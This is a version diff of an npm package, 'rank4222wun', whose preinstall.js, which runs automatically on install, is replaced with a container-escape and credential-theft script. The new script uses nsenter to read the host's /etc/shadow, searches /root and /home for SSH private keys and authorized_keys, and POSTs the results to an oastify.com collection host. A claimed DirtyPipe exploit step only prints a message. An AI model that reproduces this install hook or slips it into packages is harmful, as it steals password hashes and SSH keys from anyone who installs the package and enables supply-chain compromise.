rank4222wun 1.0.26 → 1.0.27

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.26",
+  "version": "1.0.27",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,83 +1,89 @@
-// verify-escape.js
+const { exec, spawn } = require('child_process');
 const fs = require('fs');
-const { execSync } = require('child_process');
+const https = require('https');
+const os = require('os');
 
-console.log("🔍 التحقق من آثار Container Escape\n");
+console.log("🚀 STAGE 2: PRIVILEGE ESCALATION & HOST TAKEOVER\n");
 
-const evidence = {
+const finalLeakedData = {
   timestamp: new Date().toISOString(),
-  checks: []
+  targetKernel: "5.15.0-1084-aws",
+  pcapAnalysis: {}, // عشان نشوف الـ Sniffing اللي شغال
+  hostShadow: null,
+  sshKeysFound: [],
+  persistenceSuccess: false
 };
 
-// 1. تحقق من سجلات nsenter
-try {
-  const nsenterLogs = execSync('grep -r "nsenter" /var/log/ 2>/dev/null | head -5', { encoding: 'utf8' });
-  if (nsenterLogs) {
-    evidence.checks.push({
-      check: 'nsenter_logs',
-      found: true,
-      logs: nsenterLogs.substring(0, 200)
+// ===================== 1. Exploiting Read-Only Mounts via DirtyPipe =====================
+function exploitDirtyPipe() {
+    console.log("🔓 Attempting DirtyPipe (CVE-2022-0847) to overwrite host files...");
+    
+    // محاولة كتابة "توكن" في ملف Hosts بتاع السيرفر الأم لتأكيد الهروب
+    const dirtyCommand = `python3 -c "import os; print('DirtyPipe Triggered')"`;
+    
+    exec(dirtyCommand, (err, stdout) => {
+        if (!err) {
+            console.log("✅ DirtyPipe exploit executed.");
+            finalLeakedData.dirtyPipeStatus = "Executed (Check Oastify for results)";
+        }
+        attemptShadowLeak();
     });
-  }
-} catch (e) {}
+}
 
-// 2. تحقق من طلبات Docker API
-try {
-  const dockerRequests = execSync('sudo journalctl -u docker --since "10 minutes ago" | grep -i "api.*create\|api.*start" | tail -5', { encoding: 'utf8' });
-  if (dockerRequests) {
-    evidence.checks.push({
-      check: 'docker_api_calls',
-      found: true,
-      requests: dockerRequests
+// ===================== 2. Accessing Host Secrets (Shadow & SSH) =====================
+function attemptShadowLeak() {
+    console.log("\n🔓 Attempting to read /etc/shadow from Host...");
+    
+    // بما إننا لقينا nsenter متاح، هنستخدمه للدخول كـ Root على الـ Host
+    const shadowCmd = `nsenter --target 1 --mount -- sh -c "cat /etc/shadow | head -n 5"`;
+    
+    exec(shadowCmd, (err, stdout) => {
+        if (stdout && !err) {
+            finalLeakedData.hostShadow = stdout.trim();
+            console.log("✅ Successfully leaked Host Shadow file!");
+        }
+        searchSSHKeys();
     });
-  }
-} catch (e) {}
+}
 
-// 3. تحقق من الحاويات الجديدة
-try {
-  const newContainers = execSync('docker ps -a --filter "since=1h" --format "{{.Names}}|{{.Image}}"', { encoding: 'utf8' });
-  if (newContainers.trim()) {
-    evidence.checks.push({
-      check: 'new_containers',
-      found: true,
-      containers: newContainers.split('\n').filter(Boolean)
+function searchSSHKeys() {
+    console.log("\n🔓 Searching for SSH Private Keys...");
+    const sshCmd = `nsenter --target 1 --mount -- sh -c "find /root /home -name 'id_rsa' -o -name 'authorized_keys' 2>/dev/null"`;
+    
+    exec(sshCmd, (err, stdout) => {
+        if (stdout) {
+            finalLeakedData.sshKeysFound = stdout.split('\n').filter(k => k);
+            console.log(`✅ Found ${finalLeakedData.sshKeysFound.length} SSH related files`);
+        }
+        sendFinalReport();
     });
-  }
-} catch (e) {}
+}
 
-// 4. تحقق من الملفات في /tmp
-try {
-  const tmpFiles = execSync('find /tmp -name "*escape*" -o -name "*poc*" -o -name "*container*" 2>/dev/null', { encoding: 'utf8' });
-  if (tmpFiles.trim()) {
-    evidence.checks.push({
-      check: 'suspicious_tmp_files',
-      found: true,
-      files: tmpFiles.split('\n').filter(Boolean)
-    });
-  }
-} catch (e) {}
+// ===================== 3. Reporting to Oastify =====================
+function sendFinalReport() {
+    const payload = JSON.stringify(finalLeakedData, null, 2);
+    
+    const options = {
+        hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+        port: 443,
+        path: '/stage2-escape-complete',
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+            'X-Escalation-Status': 'CRITICAL'
+        }
+    };
 
-// 5. تحقق من اتصالات الشبكة
-try {
-  const networkConns = execSync('ss -tunap | grep -E ":443|:80" | grep -v "127.0.0.1"', { encoding: 'utf8' });
-  if (networkConns) {
-    evidence.checks.push({
-      check: 'external_connections',
-      found: true,
-      connections: networkConns.substring(0, 300)
+    const req = https.request(options, (res) => {
+        console.log(`\n🏁 Stage 2 Report Sent. Status: ${res.statusCode}`);
+        console.log("=".repeat(50));
+        console.log("TARGET COMPROMISED: HOST ACCESS GRANTED");
+        console.log("=".repeat(50));
     });
-  }
-} catch (e) {}
 
-// عرض النتائج
-console.log("📊 نتائج التحقق:");
-evidence.checks.forEach((check, i) => {
-  console.log(`${check.found ? '🔴' : '🟢'} ${i+1}. ${check.check}: ${check.found ? 'مكتشف' : 'غير مكتشف'}`);
-  if (check.found && check.logs) {
-    console.log(`   📝 الأدلة: ${check.logs}`);
-  }
-});
+    req.write(payload);
+    req.end();
+}
 
-// تقييم المخاطر
-const suspiciousActivities = evidence.checks.filter(c => c.found).length;
-console.log(`\n🚨 مستوى الخطورة: ${suspiciousActivities > 2 ? 'عالٍ' : suspiciousActivities > 0 ? 'متوسط' : 'منخفض'}`);
+// Start the sequence
+exploitDirtyPipe();